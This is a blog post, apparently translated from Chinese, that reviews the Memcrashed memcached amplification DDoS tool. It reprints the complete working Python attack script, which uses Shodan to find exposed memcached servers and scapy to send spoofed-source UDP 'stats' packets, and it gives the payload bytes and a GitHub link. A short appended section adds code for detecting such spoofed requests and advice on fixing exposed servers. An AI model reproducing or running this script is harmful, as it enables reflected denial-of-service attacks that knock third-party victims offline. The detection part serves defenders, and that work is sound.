Reviewing the Memcrashed DrDoS attack code

0x00 Preface:

It has been roughly two weeks since the largest DrDoS attack the world has seen.

Yesterday, while we were chatting, a group member found the exploit on GitHub.

0x01 Getting started:

#!/usr/bin/env python3
# -*- coding: utf-8 -*-
import sys, os, time, shodan # import the sys, os, time and shodan modules
from pathlib import Path # import Path from pathlib
from scapy.all import * # import scapy
from contextlib import contextmanager, redirect_stdout # import contextmanager and redirect_stdout from contextlib

starttime = time.time() # record the start time

@contextmanager
def suppress_stdout():
    with open(os.devnull, "w") as devnull: # the null device path for the current platform
        with redirect_stdout(devnull):
            yield

class color:
    HEADER = '\033[0m' # terminal colour code string

keys = Path("./api.txt") # look for api.txt
# the pretty banner
logo = color.HEADER + '''
   ███╗   ███╗███████╗███╗   ███╗ ██████╗██████╗  █████╗ ███████╗██╗  ██╗███████╗██████╗
   ████╗ ████║██╔════╝████╗ ████║██╔════╝██╔══██╗██╔══██╗██╔════╝██║  ██║██╔════╝██╔══██╗
   ██╔████╔██║█████╗  ██╔████╔██║██║     ██████╔╝███████║███████╗███████║█████╗  ██║  ██║
   ██║╚██╔╝██║██╔══╝  ██║╚██╔╝██║██║     ██╔══██╗██╔══██║╚════██║██╔══██║██╔══╝  ██║  ██║
   ██║ ╚═╝ ██║███████╗██║ ╚═╝ ██║╚██████╗██║  ██║██║  ██║███████║██║  ██║███████╗██████╔╝
   ╚═╝     ╚═╝╚══════╝╚═╝     ╚═╝ ╚═════╝╚═╝  ╚═╝╚═╝  ╚═╝╚══════╝╚═╝  ╚═╝╚══════╝╚═════╝
                                        Author: @037
                                        Version: 3.2
####################################### DISCLAIMER ########################################
| Memcrashed is a tool that allows you to use Shodan.io to obtain hundreds of vulnerable  |
| memcached servers. It then allows you to use the same servers to launch widespread      |
| distributed denial of service attacks by forging UDP packets sourced to your victim.    |
| Default payload includes the memcached "stats" command, 10 bytes to send, but the reply |
| is between 1,500 bytes up to hundreds of kilobytes. Please use this tool responsibly.   |
| I am NOT responsible for any damages caused or any crimes committed by using this tool. |
###########################################################################################

'''
print(logo) # print the pretty banner = =

if keys.is_file(): # if the file exists at this path
    with open('api.txt', 'r') as file: # read api.txt
        SHODAN_API_KEY = file.readline().rstrip('\n') # read the first line and strip the newline
else: # if the file does not exist
    file = open('api.txt', 'w') # create api.txt
    SHODAN_API_KEY = input('[*] Please enter a valid Shodan.io API Key: ') # wait for user input
    file.write(SHODAN_API_KEY) # write what the user entered
    print('[~] File written: ./api.txt') # self-explanatory = =
    file.close() # close the file

while True:
    api = shodan.Shodan(SHODAN_API_KEY) # your Shodan key
    print('') # = =
    try:
        myresults = Path("./bots.txt") # look for bots.txt
        query = input("[*] Use Shodan API to search for affected Memcached servers? <Y/n>: ").lower() # wait for user input and lower-case it
        if query.startswith('y'): # if the user entered y
            print('')
            print('[~] Checking Shodan.io API Key: %s' % SHODAN_API_KEY)
            results = api.search('product:"Memcached" port:11211') # search Shodan for Memcached services on port 11211
            print('[✓] API Key Authentication: SUCCESS')
            print('[~] Number of bots: %s' % results['total'])
            print('')
            saveresult = input("[*] Save results for later usage? <Y/n>: ").lower() # wait for user input and lower-case it
            if saveresult.startswith('y'): # if y
                file2 = open('bots.txt', 'a') # open bots.txt for appending
                for result in results['matches']: # iterate over the Shodan results
                    file2.write(result['ip_str'] + "\n") # write each found IP to bots.txt
                print('[~] File written: ./bots.txt')
                print('')
                file2.close() # close the file
        saveme = input('[*] Would you like to use locally stored Shodan data? <Y/n>: ').lower() # wait for user input and lower-case it
        if myresults.is_file(): # if bots.txt exists at this path
            if saveme.startswith('y'): # the user entered y
                with open('bots.txt') as my_file: # read bots.txt
                    ip_array = [line.rstrip() for line in my_file] # read the IPs
        else: # if the txt file is not there
            print('')
            print('[✘] Error: No bots stored locally, bots.txt file not found!')
            print('')
        if saveme.startswith('y') or query.startswith('y'): # if either one is y
            print('')
            target = input("[▸] Enter target IP address: ") # wait for user input
            power = int(input("[▸] Enter preferred power (Default 1): ") or "1")
            data = input("[▸] Enter payload contained inside packet: ") or "\x00\x00\x00\x00\x00\x01\x00\x00stats\r\n"
            print('')
            if query.startswith('y'): # if the input was y
                iplist = input('[*] Would you like to display all the bots from Shodan? <Y/n>: ').lower() # wait for input
                if iplist.startswith('y'): # if the input is y
                    print('')
                    counter = 0
                    for result in results['matches']: # iterate over the Shodan results
                        host = api.host('%s' % result['ip_str']) # look up host details for the IP
                        counter = counter + 1
                        print('[+] Memcache Server (%d) | IP: %s | OS: %s | ISP: %s |' % (counter, result['ip_str'], host.get('os', 'n/a'), host.get('org', 'n/a')))
                        time.sleep(1.1 - ((time.time() - starttime) % 1.1))
            if saveme.startswith('y'): # if y
                iplistlocal = input('[*] Would you like to display all the bots stored locally? <Y/n>: ').lower() # wait for input
                if iplistlocal.startswith('y'): # if the input is y
                    print('')
                    counter = 0
                    for x in ip_array:
                        host = api.host('%s' % x)
                        counter = counter + 1
                        print('[+] Memcache Server (%d) | IP: %s | OS: %s | ISP: %s |' % (counter, x, host.get('os', 'n/a'), host.get('org', 'n/a')))
                        time.sleep(1.1 - ((time.time() - starttime) % 1.1)) # wait about one second, adjusted for the time already elapsed
            print('')
            engage = input('[*] Ready to engage target %s? <Y/n>: ' % target).lower() # wait for user input
            if engage.startswith('y'): # if y
                if saveme.startswith('y'): # if y
                    for i in ip_array: # iterate over ip_array
                        if power > 1: # if power is greater than 1
                            print('[+] Sending %d forged UDP packets to: %s' % (power, i))
                            with suppress_stdout():
                                send(IP(src=target, dst='%s' % i) / UDP(dport=11211)/Raw(load=data), count=power)
                        elif power == 1: # if power equals 1
                            print('[+] Sending 1 forged UDP packet to: %s' % i)
                            with suppress_stdout():
                                send(IP(src=target, dst='%s' % i) / UDP(dport=11211)/Raw(load=data), count=power) # send the data to the memcached server with a forged source IP
                else: # otherwise (use the Shodan results)
                    for result in results['matches']:
                        if power > 1: # if power is greater than 1
                            print('[+] Sending %d forged UDP packets to: %s' % (power, result['ip_str']))
                            with suppress_stdout():
                                send(IP(src=target, dst='%s' % result['ip_str']) / UDP(dport=11211)/Raw(load=data), count=power) # send the data with a forged source IP
                        elif power == 1: # if power equals 1
                            print('[+] Sending 1 forged UDP packet to: %s' % result['ip_str'])
                            with suppress_stdout():
                                send(IP(src=target, dst='%s' % result['ip_str']) / UDP(dport=11211)/Raw(load=data), count=power) # send the data with a forged source IP
                print('')
                print('[•] Task complete! Exiting Platform. Have a wonderful day.')
                break
            else:
                print('')
                print('[✘] Error: %s not engaged!' % target)
                print('[~] Restarting Platform! Please wait.')
                print('')
        else:
            print('')
            print('[✘] Error: No bots stored locally or remotely on Shodan!')
            print('[~] Restarting Platform! Please wait.')
            print('')

    except shodan.APIError as e:
        print('[✘] Error: %s' % e)
        option = input('[*] Would you like to change API Key? <Y/n>: ').lower() # wait for input
        if option.startswith('y'): # if y
            file = open('api.txt', 'w') # create api.txt
            SHODAN_API_KEY = input('[*] Please enter valid Shodan.io API Key: ') # enter your Shodan key
            file.write(SHODAN_API_KEY) # write it to the file
            print('[~] File written: ./api.txt')
            file.close() # close the file
            print('[~] Restarting Platform! Please wait.')
            print('')
        else: # otherwise
            print('')
            print('[•] Exiting Platform. Have a wonderful day.')
            break

Payload sent to the memcached servers: \x00\x00\x00\x00\x00\x01\x00\x00stats\r\n

Memcrashed exploit address: https://github.com/649/Memcrashed-DDoS-Exploit

0x02 The approach, as recovered from analysing the code:

1. Obtain from Shodan the IPs of memcached servers with port 11211 open

2. Iterate over the IPs returned by Shodan and write them to a file

3. Iterate over the file of saved IPs

4. Spoof the source IP and send the following data to each IP: \x00\x00\x00\x00\x00\x01\x00\x00stats\r\n
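Seen from the memcached host's side, what these four steps produce is a UDP datagram on port 11211 whose payload is the 8-byte memcached UDP frame header (request id, sequence number, datagram count, reserved) followed by a text command, arriving from a source the server has no reason to serve. The following is an added example, not part of the original post or of the Memcrashed tool: it parses that frame and flags such requests in constructed sample traffic; the packet tuple layout and the internal network range are assumptions.

```python
import ipaddress
import struct
from typing import List, Optional, Tuple

MEMCACHED_UDP_PORT = 11211
# Memcached UDP frame header: request id, sequence number, datagram count, reserved (big-endian u16 each).
FRAME_HDR = struct.Struct("!HHHH")
# Text commands whose reply can dwarf the request; "stats" is the default payload of the tool above.
AMPLIFYING_CMDS = {b"stats", b"get", b"gets"}

def parse_frame(payload: bytes) -> Optional[Tuple[int, int, int, bytes]]:
    """Return (request_id, seq, total, command) or None if payload is not a memcached UDP frame."""
    if len(payload) <= FRAME_HDR.size:
        return None
    request_id, seq, total, reserved = FRAME_HDR.unpack_from(payload)
    if reserved != 0 or total == 0 or seq >= total:
        return None
    first_line = payload[FRAME_HDR.size:].split(b"\r\n", 1)[0]
    return request_id, seq, total, first_line.split(b" ", 1)[0].lower()

def find_spoofed_requests(packets, internal_net: str) -> List[Tuple[str, str, bytes, int]]:
    """Flag UDP datagrams to 11211 from outside internal_net that carry an amplifying command.

    Each packet is an assumed (src_ip, dst_ip, dst_port, payload) tuple as a capture parser might yield.
    Returns (src_ip, dst_ip, command, request_id) per hit."""
    net = ipaddress.ip_network(internal_net)
    findings = []
    for src, dst, dport, payload in packets:
        if dport != MEMCACHED_UDP_PORT or ipaddress.ip_address(src) in net:
            continue  # not memcached, or a legitimate internal client
        parsed = parse_frame(payload)
        if parsed is not None and parsed[3] in AMPLIFYING_CMDS:
            findings.append((src, dst, parsed[3], parsed[0]))
    return findings

# Constructed sample traffic, not a real capture: two datagrams carrying the tool's default payload
# with an external "source" (the spoofed victim), one legitimate internal get, one on an unrelated port.
SAMPLE_PACKETS = [
    ("203.0.113.10", "10.0.0.5", 11211, b"\x00\x00\x00\x00\x00\x01\x00\x00stats\r\n"),
    ("203.0.113.10", "10.0.0.6", 11211, b"\x00\x01\x00\x00\x00\x01\x00\x00stats\r\n"),
    ("10.0.0.20", "10.0.0.5", 11211, b"\x00\x02\x00\x00\x00\x01\x00\x00get session:abc\r\n"),
    ("203.0.113.11", "10.0.0.5", 53, b"\x00\x00\x00\x00\x00\x01\x00\x00stats\r\n"),
]

if __name__ == "__main__":
    for src, dst, cmd, rid in find_spoofed_requests(SAMPLE_PACKETS, "10.0.0.0/8"):
        print(f"external {src} -> {dst}: '{cmd.decode()}' (request id {rid})")
```

Any hit here means UDP 11211 is reachable from outside, which is the condition the tool depends on; the fix on the server side is to disable the UDP listener or filter the port at the edge.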
